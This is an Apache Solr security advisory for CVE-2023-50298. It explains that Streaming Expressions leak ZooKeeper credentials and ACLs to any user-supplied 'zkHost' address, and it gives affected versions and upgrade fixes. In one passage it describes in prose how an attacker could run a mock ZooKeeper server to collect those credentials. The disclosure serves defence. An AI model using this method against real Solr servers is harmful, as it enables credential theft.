Severity: low Affected versions:
- Apache Solr 6.0.0 through 8.11.2 - Apache Solr 9.0.0 before 9.4.1 Description: Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr.This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1. Solr Streaming Expressions allows users to extract data from other Solr Clouds, using a "zkHost" parameter. When original SolrCloud is setup to use ZooKeeper credentials and ACLs, they will be sent to whatever "zkHost" the user provides. An attacker could setup a server to mock ZooKeeper, that accepts ZooKeeper requests with credentials and ACLs and extracts the sensitive information, then send a streaming expression using the mock server's address in "zkHost". Streaming Expressions are exposed via the "/streaming" handler, with "read" permissions. Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue. >From these versions on, only zkHost values that have the same server address >(regardless of chroot), will use the given ZooKeeper credentials and ACLs when >connecting. This issue is being tracked as SOLR-17098 Credit: Qing Xu (reporter) References: https://solr.staged.apache.org/security.html#cve-2023-50298-apache-solr-can-expose-zookeeper-credentials-via-streaming-expressions https://solr.apache.org https://www.cve.org/CVERecord?id=CVE-2023-50298 https://issues.apache.org/jira/browse/SOLR-17098
